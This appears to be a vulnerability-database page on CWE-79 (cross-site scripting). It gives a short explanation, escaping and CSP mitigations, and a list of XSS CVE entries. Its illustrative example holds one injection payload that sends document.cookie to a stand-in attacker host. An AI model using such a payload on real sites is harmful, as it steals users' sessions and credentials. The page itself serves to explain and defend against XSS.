Fallos del tipo CWE-79

29.080 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-4637LOWep3-bs cross site scriptingEPSS 0.5%CVE-2018-25053MEDIUMmoappi Json2html json2html.js cross site scriptingEPSS 0.5%CVE-2022-45728MEDIUMDoctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability.EPSS 0.5%CVE-2022-3631MEDIUMOAuth Client by DigitialPixies <= 1.1.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-38356MEDIUMTinyMCE Cross-Site Scripting (XSS) vulnerability using noneditable_regexp optionEPSS 0.5%CVE-2026-55665HIGHDOM-based XSS in Grist via unsanitized links, enabling privilege escalationEPSS 0.5%CVE-2024-28092HIGHUBEE DDW365 XCNDDW365 8.14.3105 software on hardware 3.13.1 allows a remote attacker within Wi-Fi proximity to conduct stored XSS attacks viEPSS 0.5%CVE-2026-59232MEDIUMStored Cross-site Scripting in Prospero Flow CRM lead name fieldEPSS 0.5%CVE-2025-5084MEDIUMPost Grid Master <= 3.4.13 - Reflected Cross-Site Scripting via argsArray['read_more_text']EPSS 0.5%CVE-2026-42052MEDIUMbeets is Vulnerable to XSSEPSS 0.5%CVE-2025-2206MEDIUMaitangbao springboot-manager permission cross site scriptingEPSS 0.5%CVE-2022-21938HIGHMetasys MUI Graphics XSSEPSS 0.5%CVE-2026-59833HIGHSiYuan: Stored XSS to RCE in SiYuan via a per-attribute URL-scheme sanitizer gap in Lute (form action / SVG xlink:href)EPSS 0.5%CVE-2026-54527CRITICALJupyterLab Git: Stored XSS leading to RCEEPSS 0.5%CVE-2026-63361HIGHLimeSurvey Community Edition 7.0.5 - Reflected XSS in HTML editor popupEPSS 0.5%CVE-2022-39799MEDIUMAn attacker with no prior authentication could craft and send malicious script to SAP GUI for HTML within Fiori Launchpad, resulting in reflEPSS 0.5%CVE-2023-1917MEDIUMPowerPress <= 10.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%CVE-2026-48094MEDIUMShareOpenly has Cross-Site Scripting (XSS) via Missing esc_url() on Shared URL in Content OutputEPSS 0.5%CVE-2022-27853MEDIUMWordPress Contest Gallery plugin <= 13.1.0.9 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2024-38357MEDIUMTinyMCE Cross-Site Scripting (XSS) vulnerability using noscript elementsEPSS 0.5%